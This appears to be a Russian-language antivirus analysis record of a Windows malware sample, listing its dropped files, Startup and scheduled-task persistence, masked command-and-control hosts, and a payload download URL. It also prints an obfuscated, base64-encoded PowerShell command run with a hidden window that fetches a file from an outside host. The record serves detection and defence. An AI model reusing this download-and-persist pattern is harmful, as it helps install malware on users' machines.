Техническая информация
- %APPDATA%\microsoft\windows\start menu\programs\startup\ufdihtcd.lnk
- <SYSTEM32>\tasks\opera scheduled autoupdate 3131961357
- http://nb#.##zzhost.com/a/cfsm.txt как %temp%\ibhhcdaf.exe
- %TEMP%\ibhhcdaf.exe
- %APPDATA%\microsoft\windows\ufdihtcd\tsdsrvgw.exe
- %APPDATA%\microsoft\windows\ufdihtcd\tsdsrvgw.exe
- %TEMP%\ibhhcdaf.exe
- 'nb#.##zzhost.com':80
- 'ms###csi.com':80
- 'cf###rthome.net':80
- http://www.ms###csi.com/ncsi.txt
- http://cf###rthome.net/1/
- DNS ASK nb#.##zzhost.com
- DNS ASK cf###rthome.net
- '%TEMP%\ibhhcdaf.exe'
- '%APPDATA%\microsoft\windows\ufdihtcd\tsdsrvgw.exe'
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' PowERsHEL`l -ExecutionPolicy Bypass -w 1 /`e IAAoAE4ARQB3AC0AbwBiAGoARQBjAHQAIAAcIGAATgBgAGUAYABUAGAALgBgAFcAYABlAGAAQgBgAEMAYABsAGAAaQBgAGUAYABOAGAAVAAdICkALgBEAG8AdwBuAEwAbwBBAGQAZgBJAGwARQAo...' (со скрытым окном)
- '%APPDATA%\microsoft\windows\ufdihtcd\tsdsrvgw.exe' ' (со скрытым окном)
- '<SYSTEM32>\taskeng.exe' {0BEE7A91-DE7D-4291-B830-561F808E821A} S-1-5-21-1960123792-2022915161-3775307078-1001:qslfias\user:Interactive:[1]